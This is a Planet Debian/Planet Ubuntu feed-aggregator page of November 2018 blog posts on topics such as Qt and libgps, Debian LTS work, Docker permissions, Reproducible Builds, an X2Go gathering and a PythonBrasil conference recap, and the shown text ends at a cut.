You are here

Agreguesi i feed

Using libgps instead of libQgpsmm within a Qt application

Planet Debian - Sht, 17/11/2018 - 8:12md
I was in need of creating a Qt application using current Debian stable (Stretch) and gpsd. I could have used libQgpsmm which creates a QTcpSocket for stablishing the connection to the gpsd daemon. But then I hit an issue: libQgpsmm was switched to Qt 5 after the Strech release, namely in gpsd 3.17-4. And I'm using Qt 5.

So the next thing to do is to use libgps itself, which is written in C. In this case one needs to call gps_open() to open a connection, gps_stream() to ask for the needed stream... and use gps_waiting() to poll the socket for data.

gps_waiting() checks for data for a maximum of time specified in it's parameters. That means I would need to create a QTimer and poll it to get the data. Poll it fast enough for the application to be responsive, but not too excessively to avoid useless CPU cycles.

I did not like this idea, so I started digging gpsd's code until I found that it exposes the socket it uses in it's base struct, struct gps_data_t's gps_fd. So the next step was to set up a QSocketNotifier around it, and use it's activated() signal.

So (very) basically:

// Class private:
struct gps_data_t mGpsData;
QSocketNotifier * mNotifier;

// In the implementation:
result = gps_open("localhost", DEFAULT_GPSD_PORT, &mGpsData);
// [...check result status...]

result = gps_stream(&mGPSData,WATCH_ENABLE|WATCH_JSON, NULL);
// [...check result status...]

//  Set up the QSocketNotifier instance.
mNotifier = new QSocketNotifier(mGpsData.gps_fd, QSocketNotifier::Read, this); 

connect(mNotifier, &QSocketNotifier::activated, this, &MyGps::readData);

And of course, calling gps_read(&mGpsData) in MyGps::readData(). With this every time there is activity on the socket readData() will be called, an no need to set up a timer anymore. Lisandro Damián Nicanor Pérez Meyer Solo sé que sé querer, que tengo Dios y tengo fe.

RcppGetconf 0.0.3

Planet Debian - Sht, 17/11/2018 - 1:23pd

A second and minor update for the RcppGetconf package for reading system configuration — not unlike getconf from the libc library — is now on CRAN.

Changes are minor. We avoid an error on a long-dead operating system cherished in one particular corner of the CRAN world. In doing so some files were updated so that dynamically loaded routines are now registered too.

The short list of changes in this release follows:

Changes in inline version 0.0.3 (2018-11-16)
  • Examples no longer run on Solaris where they appear to fail.

Courtesy of CRANberries, there is a diffstat report. More about the package is at the local RcppGetconf page and the GitHub repo.

This post by Dirk Eddelbuettel originated on his Thinking inside the box blog. Please report excessive re-aggregation in third-party for-profit settings.

Dirk Eddelbuettel Thinking inside the box

How to measure learning outcomes ? The learner and the Cynic

Planet Debian - Pre, 16/11/2018 - 4:38md

I have been having a series of strange dreams for few days now. I had seen a bollywood movie called Sui-Dhaaga few days back .

The story is an improbable, semi-plausible story of a person, couple, no a community’s search for self-respect and dignity in labor. While the clothes shown in the movie at the fashion show were shown to be made by them, the styles seemed pretty much reminiscent of the materials and styles used by National Institute of Design.

One of the first dreams I had were of being in some sort of bare foot Design school which is/was interdisciplinary in nature. I am the bored guy who is there because he has no other skills and have been pressured by parents and well-wishers to do the course and even failed in that. I have been observing a guy who is always cleaner than the rest of us, always has a smile on his face and is content and enjoys working with cloth, whether it is tailoring or anything and everything to do with cloth. The material used is organic handspun Khadi which is mixed with silk to lose the coarseness and harshness that handspun Khadi has but using the least of chemicals and additives and is being sold at very low prices so that even a poor person can afford it.

This in reality is still a distant dream.

Anyways, with that as a backgrounder to the story, one day there is a class picnic/short travel. Because the picnic is ‘free’ i.e. paid by the Institute , almost everybody else except the gentleman who is always smiling and content agrees and wants to go to the picnic. The gentleman asks that he would prefer to be there in the classroom, studying and working with the cloth.

The lone teacher/management is in a fix. While he knows the student and doesn’t question his sincerity he is in a fix because the whole class/school is going for the picnic and there are expensive machines, material lying around. Even the watchmen want to be on the picnic and the teacher/management doesn’t have the heart to say no to them.

He asks in a sort of dejected voice if somebody wants to stay behind with him. A part of me wants to go to the picnic, a part of me wants to stay behind and if possible learn about the person’s mystery of his smile and contentedness.

After awaiting appropriate time and teacher asking couple of times, I take on a bored, resigned tone and volunteer to stay behind, provided I get some of the sweets and any clothes or whatever is distributed.

The next day, I wear one of my lesser shabbier clothes and go to school and find him near the gates of the school, at a nearby chai shop/tapri. He asks me how I am and asks if I would like to eat and drink something. I quickly order 3-4 items and after a fullish breakfast ended by a sweet masala chai we go to the school.

The ‘school’ is nothing but a two rooms with two adjacent toilets, one for men, one for women. The school is probably 500 meters squarish spaced with one corner for embroidery works, one corner for dyeing works, one corner for handspunning khadi and one corner which has tailoring machines. Just last year we had painted the walls of the school using organic colors and the year before we had some students come in who helped us in having more natural light and air to the school.

We also had a new/old water pump which after a long fight with the local councillor we had been able to get and got running water of sorts. We went to the loo, washed our hands, faces, cracked a few jokes and then using the heavy iron key chain which had multiple keys, opened the front door and we went in. He going to his seat, while I going to mine. As always, he’s fully absorbed, immersed in his work.

After waiting for half an hour to an hour, I announced that I’m going to take a leak and have water. He agreed to join me and we had a short break. After coming back, I sat a little across him and asked if I could ask him a few questions. Without missing a beat, he said sure. I asked him a few probing questions as to who he was, who else was in his family, what he used to do before enrolling here.

Slowly but surely, he teased out the answers sharing that while he had been a successful person and had money (he actually said ‘entrepreneur’ but my dream self couldn’t make out what it was) and while he had money saved, his wife was supporting him in this venture as she was good at Maths (a ‘statistician’ which again my dream self was oblivious was all about) and apart from learning about clothes, how they are made etc. something which he always enjoyed but which was discouraged in his house. They were working on a book about ‘learning outcomes’ (which again my dream self knew nothing about, but when he said he would be sharing stories about me and my class-mates I was excited and apprehensive at the same time.) He assured it would be nothing bad.

I asked him in my innocence as to why such a book was necessary because in my world-view we were doing nothing exciting about a school where most of us were learning in the hopes that with the skills we would somehow be able to eke out a living. Looking at the bleakness of the background of the people around me, I didn’t think there was anything worth writing about. I had learnt about writers who were given money to write about fairy tales and even had got a comic book or two with bright colors and pictures. When I asked him if it was going to be something similar to that book, he replied in the negative . He shared that they were in-fact were going to self-publish the book as the book was going to be ‘controversial’ in nature. While my dream self didn’t understand what ‘controversial was all about but was concerned when he explained that they would be putting up their own money to bring out the book. I felt this was foolishness as nobody I knew would spent money to print a book which didn’t have pictures and it was not also a fantasy like about a hero battling dragons and such.

At this moment, my dream ended. For those who had been working in the education sector I’m sure they would be having a laugh on almost all the aspects of the dream/story. ‘Learning outcomes’ has never been a serious consideration by either the Government of the day or previous Governments. Teachers are the most lowly paid staff in the Government machinery. Most of them who enter the profession, do it out of not being able to get a job any other way and are also not obsessed by the subject/s they teach. They somehow want to make ends meet. The less said of the ‘no detention’ policy of the Government, the better. Even the Government doesn’t believe the stats trouted by its own people but instead on ASER made by Pratham although the present Government has reversed it as it wants to show they have been doing the best job in field of education.

shirishag75 #planet-debian – Experiences in the community

Frustrating spammers

Planet Debian - Pre, 16/11/2018 - 10:31pd

Sometimes tiny things make my day at 9am already.

That spammer got frustrated because none of his bots would get comments pasted to my blog:

Greetings to Cambodia.

BTW: Mikrotik RouterOS 6.41, CVE-2018-7445. RCE unpatched for 9+ months.

Daniel Lange Daniel Lange's blog

Robert Ancell: Counting Code in GNOME Settings

Planet Ubuntu - Enj, 15/11/2018 - 9:05md
I've been spending a bit of time recently working on GNOME Settings. One part of this has been bringing some of the older panel code up to modern standards, one of which is making use of GtkBuilder templates.
I wondered if any of these changes would show in the stats, so I wrote a program to analyse each branch in the git repository and break down the code between C and GtkBuilder. The results were graphed in Google Sheets:

This is just the user accounts panel, which shows some of the reduction in C code and increase in GtkBuilder data:

Here's the breakdown of which panels make up the codebase:

I don't think this draws any major conclusions, but is still interesting to see. Of note:
  • Some of the changes make in 3.28 did reduce the total amount of code! But it was quickly gobbled up by the new Thunderbolt panel.
  • Network and Printers are the dominant panels - look at all that code!
  • I ignored empty lines in the files in case differing coding styles would make some panels look bigger or smaller. It didn't seem to make a significant difference.
  • You can see a reduction in C code looking at individual panels that have been updated, but overall it gets lost in the total amount of code.
I'll have another look in a few cycles when more changes have landed (I'm working on a new sound panel at the moment).

Ubuntu Podcast from the UK LoCo: S11E36 – Thirty-Six Hours

Planet Ubuntu - Enj, 15/11/2018 - 4:00md

This week we’ve been resizing partitions. We interview Andrew Katz and discuss open souce and the law, bring you a command line love and go over all your feedback.

It’s Season 11 Episode 36 of the Ubuntu Podcast! Alan Pope, Mark Johnson and Martin Wimpress are connected and speaking to your brain.

In this week’s show:

snap install hub hub ci-status hub issue hub pr hub sync hub pull-request
  • And we go over all your amazing feedback – thanks for sending it – please keep sending it!

  • Image credit: Greyson Joralemon

That’s all for this week! You can listen to the Ubuntu Podcast back catalogue on YouTube. If there’s a topic you’d like us to discuss, or you have any feedback on previous shows, please send your comments and suggestions to or Tweet us or Comment on our Facebook page or comment on our Google+ page or comment on our sub-Reddit.

Freexian’s report about Debian Long Term Support, October 2018

Planet Debian - Enj, 15/11/2018 - 3:36md

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In October, about 209 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Abhijith PA did 1 hour (out of 10 hours allocated + 4 extra hours, thus keeping 13 extra hours for November).
  • Antoine Beaupré did 24 hours (out of 24 hours allocated).
  • Ben Hutchings did 19 hours (out of 15 hours allocated + 4 extra hours).
  • Chris Lamb did 18 hours (out of 18 hours allocated).
  • Emilio Pozuelo Monfort did 12 hours (out of 30 hours allocated + 29.25 extra hours, thus keeping 47.25 extra hours for November).
  • Holger Levsen did 1 hour (out of 8 hours allocated + 19.5 extra hours, but he gave back the remaining hours due to his new role, see below).
  • Hugo Lefeuvre did 10 hours (out of 10 hours allocated).
  • Markus Koschany did 30 hours (out of 30 hours allocated).
  • Mike Gabriel did 4 hours (out of 8 hours allocated, thus keeping 4 extra hours for November).
  • Ola Lundqvist did 4 hours (out of 8 hours allocated + 8 extra hours, but gave back 4 hours, thus keeping 8 extra hours for November).
  • Roberto C. Sanchez did 15.5 hours (out of 18 hours allocated, thus keeping 2.5 extra hours for November).
  • Santiago Ruano Rincón did 10 hours (out of 28 extra hours, thus keeping 18 extra hours for November).
  • Thorsten Alteholz did 30 hours (out of 30 hours allocated).
Evolution of the situation

In November we are welcoming Brian May and Lucas Kanashiro back as contributors after they took some break from this work.

Holger Levsen is stepping down as LTS contributor but is taking over the role of LTS coordinator that was solely under the responsibility of Raphaël Hertzog up to now. Raphaël continues to handle the administrative side, but Holger will coordinate the LTS contributors ensuring that the work is done and that it is well done.

The number of sponsored hours increased to 212 hours per month, we gained a new sponsor (that shall not be named since they don’t want to be publicly listed).

The security tracker currently lists 27 packages with a known CVE and the dla-needed.txt file has 27 packages needing an update.

Thanks to our sponsors

New sponsors are in bold.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

Raphaël Hertzog apt-get install debian-wizard

Raphaël Hertzog: Freexian’s report about Debian Long Term Support, October 2018

Planet Ubuntu - Enj, 15/11/2018 - 3:36md

Like each month, here comes a report about the work of paid contributors to Debian LTS.

Individual reports

In October, about 209 work hours have been dispatched among 13 paid contributors. Their reports are available:

  • Abhijith PA did 1 hour (out of 10 hours allocated + 4 extra hours, thus keeping 13 extra hours for November).
  • Antoine Beaupré did 24 hours (out of 24 hours allocated).
  • Ben Hutchings did 19 hours (out of 15 hours allocated + 4 extra hours).
  • Chris Lamb did 18 hours (out of 18 hours allocated).
  • Emilio Pozuelo Monfort did 12 hours (out of 30 hours allocated + 29.25 extra hours, thus keeping 47.25 extra hours for November).
  • Holger Levsen did 1 hour (out of 8 hours allocated + 19.5 extra hours, but he gave back the remaining hours due to his new role, see below).
  • Hugo Lefeuvre did 10 hours (out of 10 hours allocated).
  • Markus Koschany did 30 hours (out of 30 hours allocated).
  • Mike Gabriel did 4 hours (out of 8 hours allocated, thus keeping 4 extra hours for November).
  • Ola Lundqvist did 4 hours (out of 8 hours allocated + 8 extra hours, but gave back 4 hours, thus keeping 8 extra hours for November).
  • Roberto C. Sanchez did 15.5 hours (out of 18 hours allocated, thus keeping 2.5 extra hours for November).
  • Santiago Ruano Rincón did 10 hours (out of 28 extra hours, thus keeping 18 extra hours for November).
  • Thorsten Alteholz did 30 hours (out of 30 hours allocated).
Evolution of the situation

In November we are welcoming Brian May and Lucas Kanashiro back as contributors after they took some break from this work.

Holger Levsen is stepping down as LTS contributor but is taking over the role of LTS coordinator that was solely under the responsibility of Raphaël Hertzog up to now. Raphaël continues to handle the administrative side, but Holger will coordinate the LTS contributors ensuring that the work is done and that it is well done.

The number of sponsored hours increased to 212 hours per month, we gained a new sponsor (that shall not be named since they don’t want to be publicly listed).

The security tracker currently lists 27 packages with a known CVE and the dla-needed.txt file has 27 packages needing an update.

Thanks to our sponsors

New sponsors are in bold.

No comment | Liked this article? Click here. | My blog is Flattr-enabled.

docker and exec permissions

Planet Debian - Mër, 14/11/2018 - 11:53md
# docker version|grep Version Version: 18.03.1-ce Version: 18.03.1-ce # cat Dockerfile FROM alpine RUN addgroup service && adduser -S service -G service COPY --chown=root:root /opt/ RUN chmod 544 /opt/ USER service ENTRYPOINT ["/opt/"] # cat #!/bin/sh ls -l /opt/ whoami # docker build -t foobar:latest .; docker run foobar Sending build context to Docker daemon 5.12kB [...] Sucessfully built 41c8b99a6371 Successfully tagged foobar:latest -r-xr--r-- 1 root root 37 Nov 14 22:42 /opt/ service # docker version|grep Version Version: 18.09.0 Version: 18.09.0 # docker run foobar standard_init_linux.go:190: exec user process caused "permission denied"

That changed with 18.06 and just uncovered some issues. I was, well let's say "surprised", that this ever worked at all. Other sets of perms like 0700 or 644 already failed with different error message on docker 18.03.1.

Sven Hoexter a blog

Visiting London

Planet Debian - Mër, 14/11/2018 - 2:42md

I'm visiting London the rest of the week (November 14th–18th) to watch match 5 and 6 of the Chess World Championship. If you're in the vicinity and want to say hi, drop me a note. :-)

Steinar H. Gunderson Steinar H. Gunderson

Alerts in Weblate to indicate problems with translations

Planet Debian - Mër, 14/11/2018 - 2:15md

Upcoming Weblate 3.3 will bring new feature called alerts. This is one place location where you will see problems in your translations. Right now it mostly covers Weblate integration issues, but it will be extended in the future for deeper translation wide diagnostics.

This will help users to better integrate Weblate into the development process giving integration hints or highlighting problems Weblate has found in the translation. It will identify typical problems like not merged git repositories, parse errors in files or duplicate translation files. You can read more on this feature in the Weblate documentation.

You can enjoy this feature on Hosted Weblate right now, it will be part of upcoming 3.3 release.

Filed under: Debian English SUSE Weblate

Michal Čihař Michal Čihař's Weblog, posts tagged by Debian

Tiago Carrondo: S01E10 – Tendência livre

Planet Ubuntu - Mër, 14/11/2018 - 3:02pd

Desta vez com um convidado, o Luís Costa, falámos muito sobre hardware, hardware livre e como não poderia deixar de ser: dos novos produtos da Libretrend, as novíssimas Librebox. Em mês de eventos a agenda teve um especial destaque com as actualizações disponíveis de todos os encontros e eventos anunciados! Já sabes: Ouve, subscreve e partilha!


Este episódio foi produzido e editado por Alexandre Carrapiço (Thunderclaws Studios – captação, produção, edição, mistura e masterização de som) contacto: thunderclawstudiosPT–arroba–

Atribuição e licenças

A imagem de capa: richard ling em Visualhunt e está licenciada como CC BY-NC-ND.

A música do genérico é: “Won’t see it comin’ (Feat Aequality & N’sorte d’autruche)”, por Alpha Hydrae e está licenciada nos termos da CC0 1.0 Universal License.

Este episódio está licenciado nos termos da licença: Attribution-NonCommercial-NoDerivatives 4.0 International (CC BY-NC-ND 4.0), cujo texto integral pode ser lido aqui. Estamos abertos a licenciar para permitir outros tipos de utilização, contactem-nos para validação e autorização.

Reproducible Builds: Weekly report #185

Planet Debian - Mar, 13/11/2018 - 2:56md

Here’s what happened in the Reproducible Builds effort between Sunday November 4 and Saturday November 10 2018:

Packages reviewed and fixed, and bugs filed diffoscope development

diffoscope is our in-depth “diff-on-steroids” utility which helps us diagnose reproducibility issues in packages. This week, version 105 was uploaded to Debian unstable by Mattia Rizzolo. It included contributions already covered in previous weeks as well as new ones from:

Website updates

There were a large number of changes to our website this week:

In addition to that we had contributions from Deb Nicholson, Chris Lamb, Georg Faerber, Holger Levsen and Mattia Rizzolo et al. on the press release regarding joining the Software Freedom Conservancy:

Test framework development

There were a large number of updates to our Jenkins-based testing framework that powers by Holger Levsen this week (see below). The most important work was done behind the scenes outside of Git which was a long debugging session to find out why the Jenkins Java processes were suddenly consuming all of the system resources whilst the machine had a load of 60-200. This involved temporarily removing all 1,300 jobs, disabling plugins and other changes. In the end, it turned out that the underlying SSH/HDD performance was configured poorly and, after this was fixed, Jenkins returned to normal.

In addition, Mattia Rizzolo fixed an issue in the web-based package rescheduling tool by encoding a string before passing to and to fix the parsing of the “issue” selector option.

This week’s edition was written by Arnout Engelen, Bernhard M. Wiedemann, Chris Lamb, Holger Levsen, Oskar Wirga, Santiago Torres, Snahil Singh & reviewed by a bunch of Reproducible Builds folks on IRC & the mailing lists.

Reproducible builds folks

Results produced while at "X2Go - The Gathering 2018" in Stuttgart

Planet Debian - Hën, 12/11/2018 - 3:25md

Over the last weekend, I have attended the FLOSS meeting "X2Go - The Gathering 2018" [1]. The event took place at the shackspace maker space in Ulmerstraße in Stuttgart-Wangen (near S-Bahn station S-Untertürkheim). Thanks to the people from shackspace for hosting us there, I highly enjoyed your location's environment. Thanks to everyone who joined us at the meeting. Thanks to all event sponsors (food + accomodation for me). Thanks to Stefan Baur for being our glorious and meticulous organizer!!!

Thanks to my family for letting me go for that weekend.

Especially, a big thanks to everyone, that I was allowed to bring our family dog "Capichera" with me to the event. While Capichera adapted quite ok to this special environment on sunny Friday and sunny Saturday, he was not really feeling well on rainy Sunday (aching joints, unwilling to move, walk interact).

For those interested and especially for our event sponsors, below you can find a list of produced results related to the gathering.


2018-11-09 Mike Gabriel (train ride + @ X2Go Gathering 2018)
  • X2Go: Port x2godesktopsharing to Qt5.
  • Arctica: Release librda 0.0.2 (upstream) and upload librda 0.0.2-1 to Debian unstable (as NEW).
  • Arctica: PR reviews and merges:
  • Arctica: Fix autobuilders (add libxkbfile-dev locally to the build systems' list of packages, required for latest nx-libs with xkb- branch merged).
  • Arctica: Fix (IMAKE_)FONT_DEFINES build logic in nx-libs (together with Ulrich Sibiller)
  • X2Go: Explain X2Go Desktop Sharing to one of the event sponsors.
  • Discuss various W-I-P branches in nx-libs and check their development status with the co-maintainers.
  • Debian: Upload to stretch-backports: mate-tweak 18.10.2-1~bpo9+1.
  • Debian: Upload to stretch-backports: mate-icon-theme 1.20.2-1~bpo9+1.
2018-11-10 - Mike Gabriel (@ X2Go Gathering 2018)
  • my tool chain: make my smtp_tunnel script more robust and specific about which autossh tunnel to take down. Add "up" and "down" as first argument, so now I can now also take down the autossh tunnel for SMTP (as opposed to doing killall autossh unspecifically).
  • Talks:
    • Discussion Slot - more general NX-Libs discussion (BIG-REQUESTS, Xinerama, Telekinesis)
    • Demo: Arctica Greeter with X2Go Logon
    • Demo/Discussion: Current state of the Python Broker, Feature Requests
    • Discussion Slot - more general NX-Libs discussion (Software rendering, OpenGL, GLX, … how is that all related? And would we be able to speed things up in a Telekinesis-like approach somehow?)
  • Cooking: : Prepare nearly vegan (the carrots had butter), organic Italian pasta (with salad and ciabatta bread) for the group. Together with Ritchi and Thomas. Much appreciation to plattsalat e.V. [2] for sponsoring the food.
  • PyHoca-CLI: Fix normal password authentication (i.e. for users that don't use SSH priv/pub keys).
  • Python X2Go / PyHoca-cli: Add check directly after authentication that exits with error, if the remote server has the X2Go Server software installed. Bail out, if not.
  • X2Go Consulting: Demo possible approach for having X2Go in the webbrowser again to Martti Pikanen.
2018-11-11 - Mike Gabriel (@ X2Go Gathering 2018 + train ride)
  • Debian: Port pinentry-x2go to Qt5, upload to unstable pinentry-x2go
  • X2Go: Apply changes on top of pinentry-x2go upstream.
  • Talks:
    • Quick introduction to librda.
  • Debian: Upload to unstable: mate-polkit 1.20.1-2.
  • X2Go: Work on x2godesktopsharing upstream:
    • allow system-wide default settings
    • store sharing group in settings (instead of hard-coding a POSIX group name)
    • rewrite the access grant/deny dialog
  • Debian: Prepare Debian package for x2godesktopsharing.
    • debconf: make the sharing group name selectable
    • debconf: auto-start desktop sharing
    • debconf: auto-activate desktop sharing when started
References sunweaver sunweaver's blog

Review: The "Trojan Room" coffee

Planet Debian - Hën, 12/11/2018 - 1:20md

I was recently invited to give a seminar at the Cambridge University's Department of Computer Science and Technology on the topic of Reproducible Builds.

Whilst it was an honour to have been asked, it also afforded an opportunity to drink coffee from the so-called "Trojan Room" which previously housed the fabled Computer Laboratory coffee pot:

For those unaware of the background, to save hackers in the building from finding the coffee machine empty, a camera was setup on the local network in 1991 using an Acorn Archimedes to capture a live 128×128 image of the pot, thus becoming the world's first webcam.

According to Quentin Stafford-Fraser, the technical limitations at the time did not matter:

The image was only updated about three times a minute, but that was fine because the pot filled rather slowly, and it was only greyscale, which was also fine, because so was the coffee.

Whilst the original pot was sold for £3,350 in 2001 what, you may ask, did I think of the coffee I sampled? Did the historical weight of the room imbue a certain impalpable quality into the beverage itself? Perhaps this modern hacker lore inspired deep intellectual thoughts in myself? Did it infuse a superlative and indefinable depth of flavour that belied the coffee's quotidian origins…?

No, it did not.

(Thanks to Allison Randal for arranging this opportunity.)

Chris Lamb lamby: Items or syndication on Planet Debian.

Achievement unlocked! I spoke at PythonBrasil[14]

Planet Debian - Hën, 12/11/2018 - 3:49pd
PyLadies (and going to PythonBrasil)

PythonBrasil is the national Python community conference that happens every year, usually in October, in Brazil.

I attended PythonBrasil for the first time in 2016, the year we had started PyLadies Porto Alegre. Back then, we were a very small group and I was the only one to go. It was definitely one of the best experiences I ever had, which, of course, set a very high standard for every single tech event I attended afterwards.

Because of the great time I had there, I wanted to bring more and more women from PyLadies Porto Alegre to experience PythonBrasil in the next editions. So, during the PyLadies Porto Alegre 1st birthday party, I encouraged the other women to submit activities to try and to go to the conference that would happen in Belo Horizonte.

When attending it for the second time, I didn't go alone. Daniela Petruzalek had her talk accepted. Claudia, also from PyLadies Porto Alegre, was able to go, for the first time, thanks to the support of the PyLadies Brazil crowdfunding campaign. To me, one of the most memorable things about this PythonBrasil was "The (unofficial) PyLadies House", where I stayed. It was a huge house that we rented and shared between about 18 people to help with the accomodation costs for all of us. We shared breakfasts and rides and stories. We watched other PyLadies rehearse their talks, made lightning tech talks late at the night and we even had a birthday party!

So, this year? The idea of encouraging PyLadies POA submissions, something that had came up almost spontaneously last year, matured and we have worked to make Pyladies Porto Alegre 2nd Birthday Party an all-day event with that purpose. The schedule? Lightning talks about Python projects from its members, talks about experiences as participants and as speakers at Python Brasil and... we also had a help from Vinta Software's Flavio Juvenal, who acted as mentor to the women who were considering to submit an activity to PythonBrasil. He even made a great Github repo with a proposal checklist to assist us - and he made himself available for reviewing the proposals we wrote.

The result? We had more than 6 women from PyLadies Porto Alegre with activities accepted to PythonBrasil[14]. Some of them even had more than one activity (tutorial and talk) accepted.

I was among the ones who had been accepted. Ever since attending the conference for the first time, it had been a goal of mine to give a talk at PythonBrasil. But not any talk. I wanted for it to be a technical talk. At last, what I learned during Outreachy and how I had used it for a real task in a job finally gave me the confidance to do so. I felt ready, so I submitted and I was accepted.

I made my way to Natal, the capital of the Rio Grande do Norte (RN) state (in the Northeast of Brazil) two days before the conference was to start, since it was the cheapest ticket I could find. Besides, the PyLadiesBRConf was scheduled to happen on the day before and I was hoping I would be able to attend. PyLadiesBRConf was a full day of talks organized by what one could have called "the original PyLadies Brazil", since the Pyladies community in Brazil actually started in Natal and was named so (afterwards we started naming the group with cities' names).

The PythonBrasil[14] conference

On the next day, PythonBrasil[14] started. It was the biggest PythonBrasil to happen yet, with over 700 atendees (plus staff). Like many PyCons, the conference days are usually split between tutorials, talks and sprints.

Day 1 - tutorials

The tutorials have free admitance and are open to anyone to attend (no matter if they have bought a ticket to the conference or not). Unfortunatelly, due to the capacity of the rooms where they would be held, there was a limit for 100 registrations for each tutorial. When I went to register for the tutorials of the first day, they were already all booked. Even so, the tutorial I was most interested in, "Builting REST APIs with Django REST Framework", had to be cancelled anyway because the presenter missed his flight. :( On this first day, I met with a few PyLadies and people from the Python community who were in Natal, I walked on the beach and I focused on the preparation for my talk.

Day 2 - tutorials

I must confess that I had registered for the tutorial on Pandas ("It's not witchcraft, it's Pandas", by Fernando Masanori) merely because Flavio Juvenal had mentioned Pandas on the feedback for my proposal. I had no idea what that was actually about and why would one even use Pandas. By noon on that second day, though, I was so very glad that I did (and that I got a spot in it!). I learned a bit about Pandas and I also learned about how to use Jupyter Notebooks, something I had never tried before either. I found both Pandas and Jupyter easy and interesting and I look forward to do some projects using them.

Back when we (PyLadies) were discussing submissions to PythonBrasil with Professor Masanori, Data Structures was something that both I and another PyLady (Debora) had mentioned we had been meaning to focus on and study more. So, he came up with the idea for a tutorial about it, called: "Data Structures are <3".

On this tutorial, I found it quite interesting learning and playing with recursive functions and with algorithms for searching. I was quite impressed with learning about heapsort (who knew doing such a thing could be so cool?).

Image Licensed CC BY-SA 3.0 Attribution: RolandH

Everything at PythonBrasil (tutorials, talks and sprint) happened in the same hotel. So, after the tutorials were over, I hung around with some of the people of the community who were staying at the same hostel. The organizing team asked for help in putting together the conference kit (bag, t-shirt, IDs and flyers). We made sort of a production line and cut the time considerably short for the volunteer team.

Afterwards, I was still processing everything that I had learned and I wanted to try the new things, so I went back to the hostel to code some more. I confess that I was so hooked that I stayed up until 2 am to create the code with Pandas that I would incorporate in my talk as a bonus content.

Day 3 - talks

On this day, I had the opportunity to meet and socialize with a lot of people who were coming to Python Brasil for the first time. It was particularly delightful to see a lot of students from a public technical school (Instituto Federal) attending the conference with their teachers. They had been given tickets, which allowed them to attend the (otherwise very expensive) conference and I must say that this is the kind of inclusion that I always want to see in tech events.

From the talks, I want to highlight these moments: I learned about Scrapy (which I have been playing around a bit since then), I watched an awesome talk about using Python with Physics (although I don't have a depth knowledge of Physics, I count as a success that I could follow the talk in it's entirety, so cheers to the presenter, Ana Maria, from PyLadies Teresina) and I must mention that I was quite impressed by Elias Dorneles' talk - about developing software for the command line. Even his "slides" were made there - and there was drawings and music too, all made with Python and using the command line!

Day 4 - talks

The second day of talks brought us the much needed talk about AfroPython, a initiative that was created to increase representation of black and native brazilian people in our community.

A talk that gathered a lot of attention (and overcrowded the room it was being given at!) was the one about using Python to understand data about suicides to help preventing them. It's a hard subject for many people, but it is one that we definitely need to talk about.

Andreza Rocha's talk "Dear White People (from HR)" also touched a lot of people. She drew from her own experiences as a tech recruiter to question about the homogenity that we (still) have in tech. "Who are the ones who recruit the people?" she asked. "For us to be recruited, we (black people) have to be alive."

It was on this day that a violation of Python Brasil's Code of Conduct happened. After a PyLady gave her talk, a male participant used the time for questions not to ask a question, but to let's say... eulogize the woman who had given the talk... by demeaning all other women who had presented before her and weren't "technical enough" or something like that. Oh, how thick we must make our skin for us to be able to come up to a stage knowing we might to be subjected to a moment like that... I am glad the PyLady was experienced and level-headed enough to own the moment and give him the deserving come back. * sigh * (After the conference, the organization published a note about the CoC violation.)

Contrary to popular belief, yes, I did watch the last keynote of the day, even though it was Facebook's. And it did surprised me. Rainer Alves spoke about the shifts in corporate culture that happened when they merged infrastructure and development people into a "Production Engineering" departament. What I found most relevant, though, was the slide below, about "Blameless postmortens". After all, how to actually correct a malpractice or an error other than working collectivelly to figure out the way? "It's not about what you did, it's about what went wrong."

This was the day we took the official photo of Python Brazil:

It was also the day we took a picture with the women who were at the conference:

Day 5 - talks

Sunday arrived and it was time for: 'But can you open it on Excel?' Exporting to TXT, CSV and JSON with Python ("'Mas dá pra abrir no Excel?'' Exportando para TXT, CSV e JSON com Python"). The focus of my talk was how to export data to those formats using mainly the tools offered by the Python Standard Library. But, as I mentioned before, thanks to what I learned during the PythonBrasil tutorials, I was able to add some extra content and show how the export to CSV could be done with Pandas as well. I was very glad about this, even though I felt like there was so little time to go over all the content I wanted to present (I had time to go through all my slides and for a very brief demonstration, but that was it). I think it went well. I even managed to speak briefly about Free Software (since I don't use Excel, and I made my demonstration with LibreOffice).

When they opened time for questions, I explicitily said "Questions, not comments, please" hoping to avoid mansplaing or another incident like the one that had happened the day before. And I know people judged me for that, but... I am also aware they judged me more harshly because I am a woman. After all, in previous editions we have had male keynotes making the very same comment without people being offended by it.

This did not stop people from coming to talk to me afterwards with comments about their experiences anyway - that was definitely better, because I felt like I could talk to them more properly and personally about it, having more time than the 5 minutes alotted to questions and not having to answer under a full audience's scrutiny.

Other than my own talk, I would like to mention some other talks I attended. There was a talk about advanced functional programming ("Going further than map, filter and reduce"), which is something that I find interesting to have some idea about it, even though I don't quite fully grasp yet. There was also the PyLadies' talk, where a group representing each region of Brazil with a PyLadies group talked about the work we have been doing. Andressa went on for PyLadies Porto Alegre and talked about all the work we have been doing in particular regarding all the Django Girls workshops we have helped at in Rio Grande do Sul since the last PythonBrasil.

Ana Paula made a fun talk about Genetic Algorithm with Python, which uses the language to work with Biology data. Another subject that I am not very familiar with, but that I found quite interesting. And I also saw Camilla Martins live coding to run Python with Node.js on the big stage.

During the lightning talks, something amazing happened: the Instituto Federal students went up on the stage and talked about their experience at PythonBrasil using a regional sung-poetry called Cordel. It was really remarkable.

Also during the lightning talks, we had Thrycia Oliveira, a former participant of Django Girls, calling to attention the fact that we need to have spaces that are inclusive to parents in the community, in particular to moms. She said that PythonBrasil organization tried to arrange so, and she thanked them for that, but it had not been possible. I also remember when she told me about her participation in Python Nordeste (a regional conference that preceeded PythonBrasil) and how she had to alternate with her husband the days she went to, because one of them had to stay at home to watch over their kids (it wasn't really a kids-inclusive event).

This day ended with Betina's keynote "Does this algorithm have a soul?", a very relevant question for the state of software development today. Her talk spoke to me and to a lot of people in the audience and I can't picure a more welcoming community to be given to.

Day 6 - sprints

Sadly, Python Brazil had to come to an end. Day 6 happened on a Monday, and that meant that the majority of the people, including almost all the Pyladies, had already returned home. :( For personal reasons that I would rather not talk about publicly, I chose not to take part on the coding sprint to help with APyB's site. Instead, because I am looking for work, I used this day mostly for networking and applying to jobs I had heard about during PythonBrasil. I don't have wifi at home and I need to take any opportunity I can get to use the internet to send CVs and taking technical tests, so that is what I did.

Wrapping things up...

